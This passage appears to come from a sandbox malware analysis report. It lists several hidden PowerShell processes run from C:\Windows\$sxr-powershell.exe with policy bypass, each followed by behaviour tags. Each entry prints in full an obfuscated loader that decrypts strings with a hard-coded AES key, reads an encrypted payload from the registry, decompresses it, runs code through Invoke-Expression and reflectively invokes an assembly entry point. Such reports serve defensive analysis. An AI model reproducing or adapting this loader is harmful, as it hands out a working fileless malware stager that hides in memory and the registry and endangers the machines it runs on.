= $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
        5⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3392
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
        5⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2140
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
        5⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1540
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = 